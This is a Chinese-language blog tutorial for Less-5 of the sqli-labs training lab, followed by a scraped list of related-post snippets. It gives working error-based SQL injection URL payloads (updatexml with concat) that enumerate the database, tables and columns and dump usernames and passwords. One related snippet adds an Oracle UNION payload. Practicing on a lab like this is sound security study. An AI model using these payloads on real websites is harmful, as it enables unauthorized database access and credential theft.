sqli-lab教程Less-5
less-5
sqli-lab通过各种方式(整型注入,字符注入,布尔盲注,时间盲注,堆叠注入…)爆出库表字段拿到字段值。
学习sqli注入必备语句:
查库:select schema_name from information_schema.schemata
查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例)
查字段:select column_name from information_schema.columns where table_name=‘users’(此处拿users表例)
查字段的值:select username,password from security.users(此处拿username,password字段为例)
1.加单引号看出,此处是用单引号包裹的,使用单引号注入
2.使用- -+闭合,回显恢复
3.使用order by语句判断列数
4.发现有三列
5.使用union select联合查询,把id改成一个不存在的值使得有回显位,这里没有回显。
因为正确的地方只会回显You are in …所以我们要用报错的方式爆出库表列和字段的值
?id=-1' union select 1,2,3 --+
6.进行爆库操作
?id=1' and updatexml(1,concat(0x7e,(database()),0x7e),1) --+
updatexml:updatexml(1,concat(0x7e,(构造语句),0x7e),1)
7.进行爆表操作
?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+
group_concat:将所有的数据连接进行拼接后作为一行显示
where:指定库的位置
8.进行爆字段操作
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+
and:逻辑和
9.进行爆字段值操作
?id=1' and updatexml(1,concat(0x7e,(select group_concat(concat_ws('~',username,password)) from security.users),0x7e),1) --+
concat_ws(’~’,A,B)
显示为(A~B),用于区分用户名、密码
注入完成! 这是方法之一,后期会出sqlmap工具等教程…
有志者,事竟成!希望你学有所成,加油吧!♥♥♥
如文章有错误感谢指出,联系Q:2181796086
如文章有帮助点赞关注一下吧!
sqli-lab教程Less-5相关推荐
- SQLi lab: Equivalent to information schema on Oracle
对于oracle数据库 '+UNION+SELECT+table_name,NULL+FROM+all_tables-- btw,如果是非oracle数据的库 '+UNION+SELECT+table ...
- Innovus零基础lab学习全面复盘总
Innovus零基础lab学习全面复盘总结(附完整版pdf) 文章右侧广告为官方硬广告,与吾爱IC社区无关,用户勿点.点击进去后出现任何损失与社区无关. 为了让各位训练营学员更快入门数字 IC 后端, ...
- Linux下VCS与Verdi联合仿真简易教程及例子示范
VCS与Verdi联合仿真简易教程及例子示范 最近在公司实习,最近也恰好在学习Linux下的IC设计环境,涉及到了VCS与Verdi联合仿真等内容,也切身感觉到,和学校学习的内容是如此的不同,此篇便来 ...
- 各种Web漏洞测试平台
为什么80%的码农都做不了架构师?>>> Sqli Lab 支持报错注入.二次注入.盲注.Update注入.Insert注入.Http头部注入.二次注入练习等.支持GET和P ...
- sqlmap报错注入
0x00 背景 学习记录一下报错型的注入,经各方整理和自己总结形成. 所有的注入原理都是一样,即用户输入被拼接执行.但后台数据库执行语句产生错误并回显到页面时即可能存在报错注入. 0x01概念 报错型 ...
- android获取用户手机信息,Android – 使用AccountManager /手机所有者的姓氏和姓氏获取用户数据...
在 Ice Cream Sandwich获得此信息很容易,因为Android包含代表设备所有者的个人资料 – 此配置文件称为"Me"配置文件,并存储在 ContactsContra ...
- CS61A 2022 fall lab0
CS61A 2022 fall lab0:Getting Started 不得不感叹实验网站是真的高级- 打算用ubuntu做实验 文章目录 CS61A 2022 fall lab0:Getting ...
- 频域波束形成matlab,SONAR_code 波束形成技术,包括相移 ,频域 matlab代码,以及相关实验的ppt 263万源代码下载- www.pudn.com...
文件名称: SONAR_code下载 收藏√ [ 5 4 3 2 1 ] 开发工具: matlab 文件大小: 25848 KB 上传时间: 2015-05-03 下载次数: 21 提 供 ...
- python sql拼接_python 字典 拼接SQL语句
def gen_sql(table_name, data): """ :param table_name: 表名称 :param data: 字典对象 key为字段(要与 ...
- 怎样安装python在桌面_在Windows上安装和配置 Jupyter Lab 作为桌面级应用程序教程...
什么是 Jupyter Lab Jupyter Lab 是 Jupyter notebook 的升级版,优点这里不作赘述. 一.安装 Jupyter Lab 如果你安装了 Anaconda,最新版的 ...
最新文章
- Xbox One 游戏欣赏: Xbox Fitness 太极拳游戏
- js深入研究之牛逼的类封装设计
- [工具]-C语言中字符串的形式打印16进制数据
- 【Vue Laravel-mix】Error with Vue lazy loading components: “Failed to resolve async component“
- java issynthetic_java.lang.reflect.Constructor.isSynthetic()方法示例
- 前端学习(1651):前端系列实战课程之json和字符串互转
- 官狼服务器临时维护,官狼三分钟新模式,跑跑狼人杀如何边跑边杀
- LeetCode MySQL 1194. 锦标赛优胜者
- 李彦宏、王海峰等成为工程院院士候选人选
- java重载静态方法_java – 使用静态和非静态方法重载的方法
- [NOI 2010]超级钢琴
- 网络编程 基础 基于socket的tcp和udp连接
- php要求输入是个数求平均值、_如何在Excel中求数字个数
- 书摘---创业36条军规6:管理的九个问题
- 介绍一款很好用的分区软件--分区助手(不用格式化磁盘哟~)
- OC 5217欧创芯原装芯片一款连续电感电流导通模 式的降压型 LED 恒流驱动器,SOT23-5 封装
- LimeSDR有用的网页链接
- python如何定义类_python中如何定义类
- 集团进口煤炭行业经历“冰火两重天”说明了啥?
- python英文文本情感分析_舆情信息浩如烟海?看看如何用Python进行英文文本的情感分析...